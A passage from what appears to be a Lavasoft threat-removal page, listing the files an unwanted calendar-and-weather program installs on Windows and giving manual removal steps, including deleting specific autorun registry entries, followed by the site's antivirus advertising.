    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÐѩת´óÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\md5dll.dll (8 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\tj.html (91 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÐÂÔö±¸Íü.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÔÆ.png (1552 bytes)
    %Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054Îí.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê СÓêתÖÐÓê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÔªÏü½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ð¶÷½Ú.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
    %Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÅäÖÃ\Uninstall.lnk (922 bytes)
    %Documents and Settings%\%current user%\Application Dataypfbyfgmr.exe (12288 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "FM4.0_201409180317" = "%Program Files%\FM4.0\201409180317\fm4.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "FM4.0_News_201409180317" = "%Program Files%\FM4.0\201409180317\fm4svr.exe -mini"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "AlmDay" = "%Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe /start"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Æ»¹û×ÀÃæ" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe /from=autorun"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now